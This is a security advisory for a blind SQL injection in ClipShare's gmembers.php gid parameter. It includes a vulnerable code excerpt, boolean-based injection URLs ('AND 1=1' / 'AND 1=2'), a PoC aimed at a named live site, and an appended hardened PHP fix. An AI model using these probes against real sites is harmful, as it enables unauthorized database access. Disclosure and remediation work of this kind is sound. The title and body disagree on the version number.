Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
Author: Esac
Affected program: ClipShare - Video Sharing Community Script 4.1.4
Official website: http://www.clip-share.com
Affected versions: any version
Note: this vulnerability only works if at least one group has been added to the community.
# To exploit this vulnerability the MAGIC_QUOTES_GPC directive must be turned off on the server side (php.ini).
==================================
## Vulnerable script
PHP script: gmembers.php, line 23
============= begin of gmembers.php ========
<?php
...
// $sql is built from the gid request parameter (the construction is not shown here);
// the advisory's finding is that gid reaches the query without validation.
$rs = $conn->execute($sql);
if ( $conn->Affected_Rows() == 1 ) {
    // exactly one group row came back: expose its fields to the template
    $urlkey  = $rs->fields['gurl'];
    $gname   = $rs->fields['gname'];
    $gupload = $rs->fields['gupload'];
    $oid     = $rs->fields['OID'];
    STemplate::assign('gname', $gname);
    STemplate::assign('gurl', $urlkey);
    STemplate::assign('gupload', $gupload);
} else {
    // no (or more than one) row: redirect to the generic "group missing" error page
    session_write_close();
    header('Location: ' .$config['BASE_URL']. '/error.php?type=group_missing');
    die();
}
...........................................;
...............................................
?>
==========================================================
============= end of gmembers.php ========================

PoC:
http://www.bkjia.com/Mavideo/gmembers.php?gid=6 [Blind SQLi]

Real exploitation:
http://server/mavideo/gmembers.php?gid=6 AND 1=1  ==> returns the normal page
http://server/mavideo/gmembers.php?gid=6 AND 1=2  ==> returns a page with some errors (or nothing: a white page)
--------------------------------------------------
PwnEd. Tested version (footer of the tested installation):
Sunday, March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz: White Tarbouch Team./Esac
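For comparison, a hardened version of the group lookup above, added here as an example and not ClipShare's own code. It assumes the same ADOdb-style $conn (whose execute() accepts a bound-parameter array), the page's $rs->fields / STemplate::assign() / $config['BASE_URL'] usage, and an assumed table and column layout (groups, GID, gurl, gname, gupload, OID).

```php
<?php
// Added example (not ClipShare's code): hardened gid lookup for gmembers.php.
// Assumes: ADOdb-style $conn with execute($sql, $params); $config['BASE_URL'];
// STemplate::assign(); table/column names below are assumptions.

function redirectGroupMissing(array $config) {
    session_write_close();
    header('Location: ' . $config['BASE_URL'] . '/error.php?type=group_missing');
    die();
}

// 1. Validate: gid must be a positive integer; anything else is rejected before
//    it can reach the query. Integer validation does not depend on php.ini
//    settings such as magic_quotes_gpc.
$gid = filter_input(INPUT_GET, 'gid', FILTER_VALIDATE_INT,
                    array('options' => array('min_range' => 1)));
if ($gid === false || $gid === null) {
    redirectGroupMissing($config);
}

// 2. Keep code and data separate: the value is bound, never concatenated into $sql,
//    so the query shape cannot be altered by request input.
$sql = 'SELECT gurl, gname, gupload, OID FROM groups WHERE GID = ?';
$rs  = $conn->execute($sql, array($gid));

// 3. Check the recordset itself rather than Affected_Rows(): false means the query
//    failed, EOF means no group matched; both lead to the same generic error page.
if ($rs !== false && !$rs->EOF) {
    STemplate::assign('gname',   $rs->fields['gname']);
    STemplate::assign('gurl',    $rs->fields['gurl']);
    STemplate::assign('gupload', $rs->fields['gupload']);
    $oid = $rs->fields['OID'];
} else {
    redirectGroupMissing($config);
}
?>
```

With the parameter validated as an integer and bound, the AND 1=1 / AND 1=2 requests from the PoC are rejected at step 1 and never reach the database, which also makes such requests easy to log and alert on.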